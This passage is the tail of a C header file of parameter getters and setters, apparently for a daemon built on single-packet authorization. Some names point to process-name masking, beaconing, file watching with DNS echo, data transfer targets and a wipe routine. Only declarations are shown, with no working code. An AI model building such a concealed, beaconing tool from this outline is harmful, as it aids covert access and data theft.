    void set_firewallconfig(struct fw_config *);
    void set_spapacketstruct(struct spa_pkt_info *);
    void set_spapacketdata(char *, unsigned int);
    void set_spapacketsourceip(unsigned int);
    void set_spapacketdestinationport(unsigned short);
    void set_accstanzastruct(struct acc_stanza *);
    void set_pcapbufsize(int);
    void set_pcaptimeout(int);
    void set_replace(int);
    void set_append(int);
    void set_remove(int);
    void set_wipeprogram(int);
    void set_iwipetimes(int);
    void set_iseed(int);
    void set_irotatingseed(int);
    void set_ipackets(int);
    void set_ipacketstodo(int);
    void inc_ipackets();
    void set_ipacketlimit(int);
    void inc_irotatingseed(); // increment rotating seed
    void dec_irotatingseed(); // decrement rotating seed
    void set_recvbufferlen(int);
    void set_pcapbufferlen(int);
    void set_recvbufferset(int);
    void set_iconfirminterval(int);
    void set_iconfirmexpiry(int);
    void set_iduplicateinterval(int);
    void set_iwatchdog(int);
    int dec_iwatchdog(); // decrement watchdog counter
    void set_keyseed(char *, int);
    void set_psmask(char *, int);
    void set_defaultpsmask();
    void set_randomizepsmask(int);
    void set_randomizepstimer(double);
    void set_originalpsname();
    void set_programname(char *, int);
    void set_devrandom(char *, int);
    void set_sleepmax(int);
    void set_minsleepmax(int);
    void set_started(int);
    void set_finished(int);
    void set_pidfd(int);
    void set_inotifyfd(int);
    void set_inotifywd(int);
    void set_inotifywatchdog(int);
    void set_inotifyevents(int);
    void inc_inotifyevents();
    void set_inotifytarget(char *, int);
    void set_beacontarget(char *, int);
    void set_transfertarget(char *, int);
    void set_inotifyoptions(char *, int);
    void set_beaconoptions(char *, int);
    void set_transferoptions(char *, int);
    void set_pkclient(char *, int);
    void set_inotifylog(int);
    void set_inotifyechodns(int);
    void set_inotifyechokey(int);
    void set_inotifyechoseed(int);
    void set_useragent(char *, int);
    int get_sockraw();
    void set_sockraw(int);
    fko_ctx_t get_pkcontext();
    int set_pkcontext();
    FILE * get_pfile();
    void set_pfile(FILE *);
    char * get_uname();
    void set_uname();
    uint get_pkbeacontcpdestport();
    uint get_pkbeaconudpdestport();
    void set_pkbeacontcpdestport(uint);
    void set_pkbeaconudpdestport(uint);
    int get_pkbeaconusetcp();
    int get_pkbeaconuseudp();
    void set_pkbeaconusetcp(int);
    void set_pkbeaconuseudp(int);

#ifdef	__cplusplus
}
#endif

#endif	/* _PARMS_H */
